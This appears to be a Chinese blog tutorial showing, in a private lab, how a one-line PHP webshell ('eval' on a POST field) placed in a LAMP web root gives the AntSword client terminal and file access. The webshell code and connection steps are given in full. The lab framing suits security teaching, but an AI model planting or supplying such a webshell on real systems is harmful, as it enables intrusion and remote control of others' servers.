- 1万界星空科技SMT行业MES系统功能_复合材料公司 mes系统 参数
- 2git merge和git rebase区别 简单易懂_git的rebase和merge有什么区别
- 3hive--小文件问题_hive 文件大小
- 4opencv中使用cuda加速图像处理_opencv cuda
- 5大数据开发之SparkSQL_spark sql
- 6推荐一个在线stable-diffusion-webui,通过文字生成动画视频的网站-Ai白日梦_stablediffusion在线生成
- 7MAC提示“因为它来自身份不明的开发者” 或“已损坏,打不开“怎么办?_无法打开“open gatekeeper friendly”,因为它来自身份不明的开发者。
- 8机器学习算法总结—— 线性回归(Linear Regression)_linearregression()
- 9structure streaming输入源之File源实现_structured streaming中file源生成json文件
- 10zmud编程
网络安全演练(一句话木马)_antsword yijuhua muma
赞
踩
在享受互联网带来的便利的同时,也充满了各种网络安全风险,本文通过搭建实验环境,演示一句话木马获取主机权限。
演示环境
服务端:安装LAMP环境,部署web网站,上传一句话木马文件
客户端:安装AntSword(蚁剑)
环境准备
服务器准备
基本信息
操作系统:centos7
ip:192.168.21.131
网站部署:LAMP
方法一:XAMPP部署,参考--php开发环境部署(xampp)-CSDN博客
方法二:宝塔面板部署,参考--宝塔面板(服务器管理)-CSDN博客
制作一句话木马文件
文件名:ant.php
文件内容:<?php @eval($_POST['php']); ?>
客户端准备
基本信息
操作系统:windows 10
ip:192.168.21.130
安装蚁剑渗透测试工具
参考:渗透测试工具(AntSword)-CSDN博客
演示
centos7系统,采用XAMPP安装方式已部署好LAMP环境
- [root@192 ~]# /opt/lampp/lampp status
- Version: XAMPP for Linux 8.2.4-0
- Apache is running.
- MySQL is running.
- ProFTPD is running.
页面访问正常
将ant.php文件上传到网站根目录
本次演示为手动将文件上传到网站根目录,也可以部署dvwa渗透测试环境,通过文件上传功能上传木马文件,本文不作演示
dvwa渗透测试环境部署参考:dvwa渗透测试环境部署-CSDN博客
- [root@192 ~]# cat /opt/lampp/htdocs/ant.php
- <?php @eval($_POST['php']); ?>
- [root@192 ~]#
浏览器访问ant.php文件,状态码返回200
客户端电脑打开“蚁剑”工具,添加数据“http://192.168.21.131/ant.php”
在空白处右击,然后点击“添加数据”
如下图所示,填写url地址和密码(一句话木马文件中定义的密码“php”),然后依次点击“测试连接”和“添加”
右击选中的数据,然后点击“虚拟终端”
获取到了终端权限
右击选中数据,点击“文件管理”
获取了文件管理权限
总结
网络安全风险无处不在,我们应当加强防护,但也不必太过担心,网络攻击成功必须天时地利人和,只要我们做好安全防护,也不会轻易被攻击。
